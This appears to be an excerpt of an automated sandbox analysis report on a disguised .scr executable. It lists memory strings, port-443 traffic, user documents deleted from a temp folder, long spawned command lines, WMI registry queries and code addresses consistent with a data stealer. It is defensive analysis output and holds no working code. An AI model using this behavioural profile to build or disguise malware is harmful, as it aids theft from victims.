              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135142986.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2151303620.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139599127.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/mediZ
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favi
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2092773459.0000028C8873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/m
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2092773459.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88278000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C871D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8D69000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57967
              Source: unknownNetwork traffic detected: HTTP traffic on port 57967 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docxJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docxJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdfJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpgJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsxJump to behavior
              Source: cmd.exeProcess created: 53

              System Summary

              barindex
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7E9D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,68_2_00007FF7F7E9D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,68_2_00007FF7F7ECB57C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE363700_2_00007FF73AE36370
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE179500_2_00007FF73AE17950
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE372BC0_2_00007FF73AE372BC
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE30F380_2_00007FF73AE30F38
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27E4C0_2_00007FF73AE27E4C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE2EB300_2_00007FF73AE2EB30
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE2E4B00_2_00007FF73AE2E4B0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27C980_2_00007FF73AE27C98
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE21C900_2_00007FF73AE21C90
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE2A4300_2_00007FF73AE2A430
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE23AE40_2_00007FF73AE23AE4
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE222A40_2_00007FF73AE222A4
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE30F380_2_00007FF73AE30F38
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE342800_2_00007FF73AE34280
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE21A840_2_00007FF73AE21A84
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE39FF80_2_00007FF73AE39FF8
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE18FD00_2_00007FF73AE18FD0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27E4C0_2_00007FF73AE27E4C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE11F500_2_00007FF73AE11F50
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE25F300_2_00007FF73AE25F30
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE3471C0_2_00007FF73AE3471C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE220A00_2_00007FF73AE220A0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE218800_2_00007FF73AE21880
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE2E01C0_2_00007FF73AE2E01C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE365EC0_2_00007FF73AE365EC
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE36D700_2_00007FF73AE36D70
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE22D500_2_00007FF73AE22D50
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE236E00_2_00007FF73AE236E0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE31EE40_2_00007FF73AE31EE4
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE286D00_2_00007FF73AE286D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE21E940_2_00007FF73AE21E94
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A80918A02_2_00007FF8A80918A0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A80912F02_2_00007FF8A80912F0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86A7B302_2_00007FF8A86A7B30
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F9AB02_2_00007FF8A86F9AB0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8762BB02_2_00007FF8A8762BB0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F90602_2_00007FF8A86F9060
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A875B0602_2_00007FF8A875B060
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87411D02_2_00007FF8A87411D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87016302_2_00007FF8A8701630
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A872E9902_2_00007FF8A872E990
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A875099B2_2_00007FF8A875099B
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86EA9402_2_00007FF8A86EA940
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87159602_2_00007FF8A8715960
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87039802_2_00007FF8A8703980
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8745A402_2_00007FF8A8745A40
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A871BB912_2_00007FF8A871BB91
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8723BA02_2_00007FF8A8723BA0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8775B002_2_00007FF8A8775B00
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E3BC02_2_00007FF8A86E3BC0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8726B402_2_00007FF8A8726B40
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86EFC702_2_00007FF8A86EFC70
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8708CB02_2_00007FF8A8708CB0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E9C802_2_00007FF8A86E9C80
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8739D802_2_00007FF8A8739D80
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A877FD802_2_00007FF8A877FD80
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A872DDA02_2_00007FF8A872DDA0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86FCDE02_2_00007FF8A86FCDE0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86EBDA02_2_00007FF8A86EBDA0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8775EF02_2_00007FF8A8775EF0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A874AE702_2_00007FF8A874AE70
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F7F602_2_00007FF8A86F7F60
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A873EFB02_2_00007FF8A873EFB0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8789FE02_2_00007FF8A8789FE0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A870CFE02_2_00007FF8A870CFE0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86FBFA02_2_00007FF8A86FBFA0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F10602_2_00007FF8A86F1060
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E70302_2_00007FF8A86E7030
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87A10E02_2_00007FF8A87A10E0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87290102_2_00007FF8A8729010
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E40B02_2_00007FF8A86E40B0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A874A1102_2_00007FF8A874A110
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A877A2802_2_00007FF8A877A280
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87062F02_2_00007FF8A87062F0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87072D02_2_00007FF8A87072D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E32952_2_00007FF8A86E3295
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87433B02_2_00007FF8A87433B0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87843302_2_00007FF8A8784330
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A873A4902_2_00007FF8A873A490
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A870E4D02_2_00007FF8A870E4D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E74B12_2_00007FF8A86E74B1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F34902_2_00007FF8A86F3490
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87525802_2_00007FF8A8752580
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87245902_2_00007FF8A8724590
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87885B02_2_00007FF8A87885B0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87835D02_2_00007FF8A87835D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E45102_2_00007FF8A86E4510
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A870C5302_2_00007FF8A870C530
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A873B5302_2_00007FF8A873B530
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E96402_2_00007FF8A86E9640
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87876C02_2_00007FF8A87876C0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F66F02_2_00007FF8A86F66F0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87107902_2_00007FF8A8710790
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87827A02_2_00007FF8A87827A0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A870D7C02_2_00007FF8A870D7C0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A872F7D02_2_00007FF8A872F7D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E77C42_2_00007FF8A86E77C4
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E47C02_2_00007FF8A86E47C0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87847502_2_00007FF8A8784750
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A87558A02_2_00007FF8A87558A0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86E282E2_2_00007FF8A86E282E
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A878E8E02_2_00007FF8A878E8E0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86FC8002_2_00007FF8A86FC800
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A878C8702_2_00007FF8A878C870
